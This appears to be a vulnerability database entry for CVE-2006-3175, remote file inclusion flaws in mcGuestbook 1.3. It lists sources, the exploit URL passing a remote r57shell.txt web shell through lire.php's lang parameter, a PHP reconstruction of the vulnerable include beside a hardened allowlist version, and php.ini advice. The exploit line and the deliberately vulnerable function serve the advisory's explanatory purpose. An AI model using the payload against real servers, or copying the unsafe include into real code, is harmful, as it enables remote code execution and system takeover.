MCGuestbook Multiple Remote File Inclusion Vulnerabilities

Vulnerability ID: 1110466    Vulnerability type: Code injection
Published: 2006-06-16    Updated: 2008-06-26
CVE: CVE-2006-3175    CNNVD ID: CNNVD-200606-461
Platform: PHP    CVSS score: 7.5
|Vulnerability Sources
https://www.exploit-db.com/exploits/28037
https://www.securityfocus.com/bid/18476
https://cxsecurity.com/issue/WLB-2006060130
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200606-461
|Vulnerability Details
mcGuestbook 1.3 contains multiple PHP remote file inclusion vulnerabilities. A remote attacker can execute arbitrary PHP code via a URL supplied in the lang parameter of (1) admin.php, (2) ecrire.php, and (3) lire.php.
|Exploit
source: http://www.securityfocus.com/bid/18476/info
  
mcGuestbook is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.
  
An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
  
http://www.example.com/path/lire.php?lang=http://www.example2.com/r57shell.txt?
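As an added illustration (not mcGuestbook's own source, which this page does not reproduce), the include pattern the advisory describes shown next to a hardened version: the lang value is only used as a key into a fixed allowlist of local translation files and never reaches include() directly. The lang/ directory, the file names and the default language are assumptions.

```php
<?php
// Hypothetical reconstruction of the vulnerable pattern described above
// (NOT mcGuestbook's actual code): the request parameter reaches include()
// unchanged, so a value of the form lang=http://host/file makes PHP fetch
// and execute a remote script when allow_url_include / allow_url_fopen is on.
function loadLanguageVulnerable(): void
{
    $lang = $_GET['lang'] ?? 'fr';
    include $lang;            // user-controlled path: remote file inclusion
}

// Hardened version: the parameter selects an entry from a constant map; the
// path that is included is built from a fixed directory and a file name the
// client cannot influence, so neither URLs nor ../ sequences are ever used.
const LANG_DIR   = __DIR__ . '/lang';   // assumed layout
const LANG_FILES = [
    'fr' => 'fr.php',                   // assumed default language
    'en' => 'en.php',
];

function resolveLanguageFile(string $requested): string
{
    // Unknown or malformed keys silently fall back to the default.
    $key = array_key_exists($requested, LANG_FILES) ? $requested : 'fr';
    return LANG_DIR . '/' . LANG_FILES[$key];
}

function loadLanguageHardened(): void
{
    $file = resolveLanguageFile((string) ($_GET['lang'] ?? 'fr'));
    // Defence in depth: refuse anything that is not an existing local file.
    if (!is_file($file)) {
        http_response_code(500);
        exit('language file missing');
    }
    include $file;
}
```

Independently of the code fix, setting allow_url_include=Off (and, where possible, allow_url_fopen=Off) in php.ini stops include() from fetching http:// or ftp:// URLs at all, which limits this class of bug to local files even if a vulnerable version remains deployed.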
|Affected Products
mcGuestbook mcGuestbook 1.3
|References

Source: XF  Name: mcguestbook-multiple-file-include(27114)  Link: http://xforce.iss.net/xforce/xfdb/27114
Source: BID  Name: 18476  Link: http://www.securityfocus.com/bid/18476
Source: BUGTRAQ  Name: 20060616 file include exploits in mcGuestbook 1.3  Link: http://www.securityfocus.com/archive/1/archive/1/437448/100/0/threaded
Source: BUGTRAQ  Name: 20060613 file include exploits in mcGuestbook 1.3  Link: http://www.securityfocus.com/archive/1/archive/1/437028/100/200/threaded
Source: OSVDB  Name: 27462  Link: http://www.osvdb.org/27462
Source: OSVDB  Name: 27461  Link: http://www.osvdb.org/27461
Source: OSVDB  Name: 27460  Link: http://www.osvdb.org/27460
Source: SREASON  Name: 1125  Link: http://securityreason.com/securityalert/1125